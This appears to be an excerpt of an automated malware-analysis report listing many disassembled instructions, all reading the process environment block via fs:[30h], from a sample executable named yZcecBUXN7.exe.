            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D8324 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118035C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A8350 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011CA352 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01182349 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D634F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A437C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE388 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F8397 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112438F mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011AE3DB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A43D4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A3C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011083C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BC3CD mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011863C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111E3F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011363FF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011103E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F823B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D625D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01106259 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01188243 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01188243 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FA250 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F826B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B0274 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01104260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E284 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01180283 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011962A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D62D6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110A2C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011102E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01196500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011D4500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110535 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E53E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108550 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113656A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01102582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01134588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011245B1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011805A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011065D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113A5D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E5CF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011025E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112E5E7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C5ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01138402 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FC427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010FE420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01186420 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_010F645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0112A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118C460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011BA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011344B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118A4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011064AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011004E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01130710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0117C730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113273C mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113C720 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01100750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01184755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0113674D mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01108770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01110770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011A678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011B47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011007AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0110C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011807C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011047FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011047FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0118E7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011227ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011227ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_011227ED mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_01142619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\yZcecBUXN7.exeCode function: 1_2_0111260B mov eax, dword ptr fs:[00000030h]
